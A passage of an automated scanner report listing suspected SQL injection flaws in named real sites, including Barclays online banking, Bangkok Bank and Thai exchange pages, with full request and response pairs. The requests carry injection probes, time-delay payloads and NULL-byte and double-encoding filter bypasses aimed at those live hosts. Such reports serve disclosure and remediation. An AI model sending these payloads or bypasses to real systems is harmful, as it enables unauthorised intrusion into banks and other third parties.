   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.3. http://group.barclays.com/html_phase_2/assets/scripts/scripts.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/scripts/scripts.min.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /html_phase_2/assets'/scripts/scripts.min.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:16:57 GMT
Set-Cookie: JSESSIONID=D56D3BD784E0F6B00405F984F691332D.tomcat_2_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /html_phase_2/assets''/scripts/scripts.min.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:16:57 GMT
Set-Cookie: JSESSIONID=2E80AD84529825C357C813F48EA52886.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:16:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.4. http://html.aggregateknowledge.com/iframe [itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the itemid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /iframe?pid=32&itemid=298028%00'&senduuid=0&che=1304429183 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 03 May 2011 13:33:20 GMT
Connection: close


<!--
An Aggregate Knowledge internal error occurred; Unable to service request.
org.springframework.dao.DataIntegrityViolationException: SqlMapClient operation; SQL [];
--- The error occur
...[SNIP]...
commender/ItemDao.xml.
--- The error occurred while applying a parameter map.
--- Check the Item.findByCustomerItemId-InlineParameterMap.
--- Check the statement (query failed).
--- Cause: org.postgresql.util.PSQLException: ERROR: invalid byte sequence for encoding "UTF8": 0x00; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException:
--- The error occurred in mapping/recommender/It
...[SNIP]...

1.5. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/IndividualSavingsAcctOverview.do

Issue detail

The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the JSESSIONID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /olb/w/IndividualSavingsAcctOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d1--%20; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:27 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d1--%20:r4ap-RolbClusterB-server04; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<scr
...[SNIP]...

Request 2

GET /olb/w/IndividualSavingsAcctOverview.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06'%20and%201%3d2--%20; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:55:28 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:55:27 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">













<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">









<head>

    <title>
    Barclays Online Banking

-
Login
Step 1 of 2

    </title>











<meta name="Description" content="Log-in to Barclays Online Banking to keep track of your money day and night. Check statements, pay bills, move money. It's convenient, easy and secure." />









<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/layout.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/modules.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/content.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/typography.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/button.css" />
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/theme.css" />

<!--[if IE 6]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie6.css" />
<![endif]-->

<!--[if IE 7]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie7.css" />
<![endif]-->

<!--[if IE 8]>
<link type="text/css" rel="stylesheet" media="all" href="/w/glo/css/ie8.css" />
<![endif]-->
<link type="text/css" rel="stylesheet" media="all" href="/w/lcl/css/ibank.css" />
<link type="text/css" rel="stylesheet" media="print" href="/w/glo/css/print.css" />









<script src="/w/glo/js/jquery-1.3.2.min.js" type="text/javascript"></script>




<meta name="WT.cg_s" content="logon - Login" />
<
...[SNIP]...

1.6. http://moneytalk.scb.co.th/index.asp [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be IBM DB2.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.asp?FileName=TH HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:26:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=HMOJLEJDAIANBDHNMEMJPCJK; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...
<font face="Arial" size=2>[IBM][CLI Driver] SQL30081N A communication error has been detected. Communication protocol being used: &quot;TCP/IP&quot;. Communication API being used: &quot;SOCKETS&quot;. Location where the error was detected:
...[SNIP]...

1.7. http://moneytalk.scb.co.th/index.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be IBM DB2.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.asp?FileName=TH&1'=1 HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...
<font face="Arial" size=2>[IBM][CLI Driver] SQL30081N A communication error has been detected. Communication protocol being used: &quot;TCP/IP&quot;. Communication API being used: &quot;SOCKETS&quot;. Location where the error was detected:
...[SNIP]...

Request 2

GET /index.asp?FileName=TH&1''=1 HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:25:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30024
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=GJOJLEJDCDKMIAOJMAHBHFCC; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="C
...[SNIP]...

1.8. http://register2.set.or.th/semreg/detail.aspx [cs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The cs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow=FKH&cs=S0001'&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:12 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5061

<html>
<head>
<title>Line 1: Incorrect syntax near '0049'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {f
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH&cs=S0001''&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:13 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=35wddb45hxabcz45p5svc555; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.9. http://register2.set.or.th/semreg/detail.aspx [ow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The ow parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ow parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow=FKH'&cs=S0001&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:33:35 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5066

<html>
<head>
<title>Line 1: Incorrect syntax near 'S0001'.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
   p {
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH''&cs=S0001&sn=0049 HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:33:37 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=rw1thrzzedtfkcezq0vvrt2a; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.10. http://register2.set.or.th/semreg/detail.aspx [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The sn parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sn parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049' HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:49 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5181

<html>
<head>
<title>Unclosed quotation mark before the character string '0049' '.</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: .7em;color
...[SNIP]...

Request 2

GET /semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049'' HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:34:50 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=p1nezdnp0qxygzii5le4dr45; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

1.11. http://www.360travelguide.com/results.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.360travelguide.com
Path:   /results.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /results.asp HTTP/1.1
Host: www.360travelguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0,0,0)waitfor%20delay'0%3a0%3a20'--
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 May 2011 13:36:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.360travelguide.com/
Content-Length: 26251
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDCCARR=CGOGAIKDIKOCGAFHKMKMPGAD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<met
...[SNIP]...
<img src='http://cache.graphicslib.viator.com/graphicslib/thumbs75/2830/SITours/bora-bora-snorkel-sharkfeeding-and-lagoonarium-full-day-tour-in-bora-bora-1.jpg' width='100px' align=left hspace='3'>
...[SNIP]...

1.12. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Online%20Banking/For%20Personal/iBanking%2527/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 191605
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 13:43:24 GMT
Last-Modified: Tue, 03 May 2011 13:43:24 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:24 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HE
...[SNIP]...
<!-- Use %=TitltName% (Scrip less)technic because Share Point Design is automatic create don't want attribute and page occor error.-->
...[SNIP]...

Request 2

GET /Online%20Banking/For%20Personal/iBanking%2527%2527/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 08 Aug 2009 19:47:17 GMT
Accept-Ranges: bytes
ETag: "8f2afb86118ca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:28 GMT
Content-Length: 0
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


1.13. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /_layouts/NR/JavaScript/truehitsstat.asp%2527 HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 191605
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 13:43:07 GMT
Last-Modified: Tue, 03 May 2011 13:43:07 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:07 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<HE
...[SNIP]...
<!-- Use %=TitltName% (Scrip less)technic because Share Point Design is automatic create don't want attribute and page occor error.-->
...[SNIP]...

Request 2

GET /_layouts/NR/JavaScript/truehitsstat.asp%2527%2527 HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 08 Aug 2009 19:47:17 GMT
Accept-Ranges: bytes
ETag: "8f2afb86118ca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:43:10 GMT
Content-Length: 0
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])


1.14. http://www.scriptlogic.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scriptlogic.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
